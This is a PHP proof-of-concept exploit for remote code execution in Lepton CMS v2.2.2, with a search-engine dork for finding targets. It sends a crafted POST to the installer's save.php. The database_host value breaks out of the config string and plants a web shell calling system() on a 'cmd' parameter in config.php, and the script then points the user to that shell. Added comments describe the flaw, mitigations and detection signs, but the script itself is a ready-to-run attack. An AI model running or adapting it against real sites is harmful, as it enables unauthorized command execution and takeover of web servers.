PHP:
<?php
/*
Lepton CMS v2.2.2 - Remote Code Execution.
Author: Hyp3rLinx
Exploit Author: ~
Dork: intext:"Design by CMS-LAB"
*/
// Endpoint: the CMS installer's save step. The success message at the end of this
// script points at /config.php, so the installer appears to write request fields into
// a PHP config file without escaping them (the vulnerability class is unsanitized
// installer input persisted into executable PHP).
// Mitigation (defender view): remove or access-restrict /install/ once setup is done,
// and generate config files with var_export()/addslashes() instead of interpolating
// request values into PHP source.
$target = "http://127.0.0.1/lepton/install/save.php";
// Injected value, sent below as the database_host field: it closes the quoted string
// and PHP tag the config file presumably wraps the value in, then adds its own PHP.
// Detection: quotes or "?>"/"<?php" sequences in installer POST fields, and unexpected
// PHP tags appearing inside config.php after a request to /install/save.php.
$payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>";
/**
 * Send one HTTP POST of a raw, pre-encoded body to $url and return cURL's transfer info.
 *
 * The response body is fetched (CURLOPT_RETURNTRANSFER) but discarded; the caller only
 * inspects the transfer info array (e.g. 'http_code').
 *
 * @param string $url       Absolute URL to request.
 * @param string $post_data Raw body string handed to CURLOPT_POSTFIELDS as-is (no encoding).
 * @return array            The array returned by curl_getinfo() for the completed transfer.
 */
function curl_post($url, $post_data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
// CURLOPT_POST is a boolean option; 15 is simply a non-zero (true) value here.
curl_setopt($ch, CURLOPT_POST, 15);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Fixed browser-like User-Agent. For defenders the more useful signal is the request
// itself: any POST to /install/save.php on an already-installed site is anomalous.
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
// Body is captured but never used; only the transfer metadata is returned below.
$output = curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
return $info;
}
// Single POST carrying every field the installer form expects; $payload travels in the
// database_host field. The GUID, credentials and other values are filler from the PoC,
// not values tied to a real installation.
$da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=$payload&database_username=root&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&[email protected]&admin_password=admin&admin_repassword=admin");
// Only the HTTP status is checked; a 200 does not by itself confirm that the installer
// accepted the fields or wrote config.php (loose == comparison, http_code is an int).
if($da['http_code'] == 200) {
echo "\nTada: Now visit /config.php?cmd= on target.\n";
}
?>